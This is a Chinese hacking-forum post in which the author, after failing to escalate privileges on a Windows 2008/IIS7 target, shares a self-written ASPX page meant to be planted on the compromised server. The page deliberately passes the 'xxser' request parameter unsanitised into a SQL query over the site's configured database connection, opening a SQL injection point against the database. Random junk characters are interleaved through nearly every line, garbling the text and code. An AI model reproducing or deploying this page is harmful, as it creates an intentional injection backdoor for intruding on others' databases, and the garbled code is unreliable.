昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
a1 @, M) S S% R其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。" t0 j+ u- r$ W
代码量不多,自己写个拉倒了。烦死了。, O+ P. y) G' F7 ]
" K% d6 }8 F! o5 `
. P' ?; ^3 R3 f. ~" u<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">* B- w/ F+ u4 \% @
<html xmlns="http://www.w3.org/1999/xhtml">' Y: a: b, T5 S
<head runat="server">" g! D1 \& U$ C9 Y: ?. C
<title>暗影aspx构造注射专用页面</title>4 \# y3 g/ v( L1 c3 F8 X
</head>6 s( \+ L- H2 g
<body>
, v, ~8 R4 `" L; E. N- d <form id="form1" runat="server">0 d/ e! L2 V4 K |8 T% |
<div>
. P/ T. M4 @8 c; S2 R <script language="c#" runat="server">% Z* Q! K0 C( K6 e* [1 L
6 q4 I- q/ S! @; z) _ void page_init(object sender, EventArgs e)2 ~) N8 k4 @5 F: g" u, J, b* ]
{# j; b! u& g. E
! `. s6 M9 u Q6 ?1 S- l
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
/ [* t' A9 O8 R5 }+ ^/ e ' T# ]' t0 f* t% J# o0 `0 V
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
; Q# d! q- A* E q conn.Open();( U! b5 G# t/ S- S! b8 I8 x6 P
7 [2 Q+ G# V* |+ k% T: P string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
2 j$ t$ s8 j/ B j4 H + N# @7 J0 x' \; A/ H
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);1 S1 _0 f% o9 h# w; A
int x = command.ExecuteNonQuery();
0 O" A1 J; Q: _" _6 _$ | Response.Write(i+"\n");
* s# I8 i7 o1 b+ z Response.Write(x);
; T6 d; M' z) ^& U9 c! D conn.Close();9 f8 {2 A8 q' I; \
}8 i8 k6 l- ?2 w, D2 ~! u& I
! L. u/ q# y- Z8 v& H </script>
+ n2 J2 l6 s/ M' R7 l K7 T </div>
2 r" h: W5 K3 D </form>+ l6 R1 X, [1 a8 u! N' n
</body>
{5 c* C9 v1 `% n' V</html>) q: K' |& ]2 v f
|